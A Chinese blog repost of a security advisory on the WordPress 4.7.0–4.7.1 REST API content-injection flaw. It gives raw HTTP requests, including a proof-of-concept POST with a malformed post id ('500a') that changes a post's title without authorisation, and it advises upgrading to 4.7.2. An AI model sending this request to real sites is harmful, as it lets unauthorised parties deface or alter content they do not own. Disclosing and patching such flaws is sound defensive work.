wp linux 权限,WordPress又曝漏洞:REST API由于权限控制失效致内容注入

最新推荐文章于 2024-07-28 02:26:38 发布
最新推荐文章于 2024-07-28 02:26:38 发布
阅读量324 收藏
点赞数
文章标签: wp linux 权限

WordPress最近曝出内容注入漏洞,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。

鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON 格式传输数据访问或控制 WordPress 站点内容的方法。API 提供了对用户、文章、分类等不同功能的控制,也可以通过 API 检索或修改文章。Wordpress REST API 插件在 4.70 集成到 WordPress 中,由于权限控制失效导致内容注入或修改。WordPress开发团队已经与Sucuri配合在最新的4.7.2版本中修复了该漏洞。

8de197700521b4fd77826f08385e8248.png

漏洞名称:

WordPress REST API 内容注入/权限提升

影响版本:

4.7.0 – 4.7.1

漏洞详情:

WordPress 在 4.7.0 版本后集成了原 REST API 插件的功能

Permalinks设置为非Plain模式

使用 WordPress 程序的网站首页上会有:

查看文章列表

GET /index.php/wp-json/wp/v2/posts HTTP/1.1

Host: xxx.net

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36

Content-Length: 4

根据文章列表可以找到对应的id

检索文章

GET /index.php/wp-json/wp/v2/posts/500 HTTP/1.1

Host: xxx.net

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36

Content-Length: 4

修改文章

POST /index.php/wp-json/wp/v2/posts/500?id=500 HTTP/1.1

Host: xxx.net

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36

Content-Type: application/json

Content-Length: 43

{"title":"x x x x"}

如果返回 401 则无权限修改

漏洞PoC:

POST /index.php/wp-json/wp/v2/posts/500?id=500a HTTP/1.1

Host: xxx.net

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36

Content-Type: application/json

Content-Length: 43

{"title":"xxxx"}

返回 200 修改成功

修复方案:

升级到 4.7.2

参考来源:

* 转载请注明来自FreeBuf.COM

0b1331709591d260c1c78e86d0c51c18.png

凤陶
关注
wordpress 外部数据接口_利用WP REST API接口实现微信小程序调用WordPress数据
weixin_31653453的博客
12-31 1000
重要:本文最后更新于2019-05-21 20:07:20,某些文章具有效性,若有错误或已失效,请在下方留言或联系代码狗。WP REST API这个东西就是个WordPress提供的向外接口,利用它可以跨平台调用WordPress网站数据。比如使用微信小程序提供的接口可以请求WP REST API实现微信小程序得到WordPress网站数据,通过安卓程序请求接口得到数据可以将你的网站做成安卓AP...
wordpress从安装到主题开发完成 极容易出现的问题以及决绝办法(主题开发)
leileibuluo的博客
09-26 229
一.apach跨域配置(服务器配置) 1.去掉apach中的httpd.conf这几个文件前面的# LoadModule proxy_module modules/mod_proxy.so LoadModule rewrite_module modules/mod_rewrite.so LoadModule proxy_balancer_module modules/mod_proxy_balancer.so LoadModule proxy_connect_module modules/mod_proxy
高危漏洞预警:WordPress REST API 被利用安装后门
weixin_33890526的博客
05-02 265
近期攻击者发现了一种利用WordPress REST API漏洞的方法,并通过安装隐藏的后门来获得对受害者服务器的完全访问。 1月26日,WordPress团队发布了WordPress 4.7.2,其中包含一个解决WordPress REST API中的漏洞的秘密修复,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击...
CVE-2022-21663: WordPress <5.8.3 版本对象注入漏洞深入分析
最新发布
swordcloud_xm的博客
07-28 2574
通过对WordPress对象注入漏洞的深入分析与复现,我们发现漏洞的利用存在一定的复杂性。这不仅是对技术能力的挑战,也是对安全意识的考验。在学习和研究过程中,我们应始终保持谨慎和敬畏之心。
漏洞分析】WordPress REST API 内容注入漏洞分析
Anprou的博客
02-08 4077
WordPress更新到最新版本。
WordPress REST API 内容注入/权限提升漏洞
weixin_34000916的博客
06-08 556
WordPress 是一个以 PHP 和 MySQL 为平台的自由开源的博客软件和内容管理系统,至少有 1800 万个网站使用该系统。在 4.7.0 版本后,REST API 插件的功能被集成到 WordPress 中,由此也引发了一些安全性问题。 WordPress REST API 内容注入/权限提升漏洞于 1 月 22 日被安全公司 Sucuri ...
WordPress漏洞————4.7.0——4.7.1内容注入漏洞分析
Fly_鹏程万里
03-30 3695
一、获取user 1.影响:未授权获取发布过文章的其他用户的用户名、id 2.触发前提: wordpress配置REST API 3.影响版本:<= 4.7 4.漏洞说明: Get请求什么都不用做就可以避开wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php 的逻辑判断,返回ture,程序继续执行query,RES...
【零散知识点总结1】
weixin_44543307的博客
03-06 6634
零散笔记总结@Reference、@Autowired和@Resource的区别:Dubbohttp和HTTPSvue.js跟thymeleaf 的区别web开发,提供3个@Component注解衍生注解(功能一样)取代 @Reference、@Autowired和@Resource的区别: @Reference:是dubbo的注解,也是注入,他一般注入的是分布式的远程服务的对象,需要dubbo配置使用。 @Autowired:org.springframework.beans.factor
2021 Java面试真题集锦
热门推荐
GL1765852966的博客
12-26 8万+
目录 … 1 大厂面试的基本流程 17 字节跳动 17 阿里 17 腾讯 18 网易游戏 18 面试前需要准备: 18 面试中可以借鉴的套路 19 用简历争取到更多的面试机会 19 自我介绍,立即全面抛出技术栈和亮点 20 先介绍项目背景,打消面试官疑问 21 通过说项目管理工具,说明你不仅会写代码 22 用 SPRING BOOT 项目举例,说明你的技术基本面 23 用实例说明你在内存调优方面的经验 24 展示你在数据库调优方面的经验 25 总结前文说辞 26 准备项目说辞,更可以准备后继面试官的问
Java知识点概览
qq_48403611的博客
08-03 3272
java后端开发常见面试题总结
百度翻译源码java-wp-useragent:一个简单的User-Agent检测插件,可让您轻松地在每条评论中插入图标​​和/或文本Web浏
06-06
百度翻译源码java
WordPress4.8.1版本存在XSS跨站攻击漏洞
weixin_34258078的博客
10-26 384
2017年10月19日,阿里云安全威胁情报系统监测到WordPress 官方发布了一条安全通告表示在4.8.1版本中发现了一个存储型的XSS漏洞,通过该漏洞,攻击者可以在受影响网站的评论区写下包含恶意代码的留言,当该留言页面被打开,其中的恶意代码会执行,导致该网站的权限,插件等被更改,甚至被完全控制,安全风险为高危。阿里云安全建议站长们关注,并尽快开...
[漏洞分析]WordPress未经身份验证的远程代码执行CVE-2024-25600
网络安全知识分享
03-14 1723
Bricks
Wordpress教程(一) Rest Api简单入门
yang45310的专栏
04-11 3708
是当今最强大的博客+cms系统,最近在用wordpress给客户搭建一款小程序,涉及到Rest Api,于是有了本篇,本篇根据官方文档和个人的理解编写,如有错误或者疏漏,请同学指正。
WordPress插件蜜蜂采集最新(2022-2-16)漏洞(XSS, WordPress用户名暴露,任意文章发布)复现
Deng_Xian_Sheng的博客
02-16 3718
本次漏洞WordPress的一款文章采集插件:蜜蜂小助手,未对实现插件功能的相关API做鉴权;导致任何人发送的请求都会被执行。
wordpress接口获取草稿箱内文章数
itsmia的博客
05-06 167
首先,你需要获取一个 WordPress 网站的 REST API 访问令牌。你可以在 WordPress 管理后台中创建一个新的用户并授予其访问令牌,或者使用一个现有用户的访问令牌。可以使用 WordPress REST API 来获取草稿箱内文章的数量。参数可以设置为任何值,它将控制每个请求返回的文章数量。的字段,该字段的值为草稿箱中文章的数量。参数用于告诉 REST API 只返回。字段包含草稿箱中文章的数量。这个请求会返回一个名为。
WordPress REST API内容注入漏洞详解
weixin_33827590的博客
08-01 571
近日,来自Sucuri的研究人员发现WordPress存在重大漏洞漏洞在于WordpressREST API,成功利用该漏洞可删除页面或修改页面内容。官方很快发布了升级版Wordpress,但很多管理员没有升级,以至于被篡改的网页从最初的几千一路飙升到了150万,在此也提醒各位管理员尽快升级。 一、漏洞详情 1. 漏洞信息: WordPres...
WordPress BuddyPress 存在越权漏洞RCE(CVE-2021-21389)
xiaobai_20190815的博客
05-11 3594
一、漏洞描述 BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题 二、影响版本 5.0.0 <BuddyPress< 7.2.1 三、漏洞环境 1、dockerhub拉镜像,docker pull hoangkien10
WordPress文章插入函数:详解wp_insert_post功能与参数
WordPress文章插入函数`wp_insert_post`是WordPress核心提供的一种强大工具,用于在WordPress数据库中插入或更新文章和页面数据。这个函数的核心作用是根据给定的文章对象参数,创建新的帖子记录或更新已有记录,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值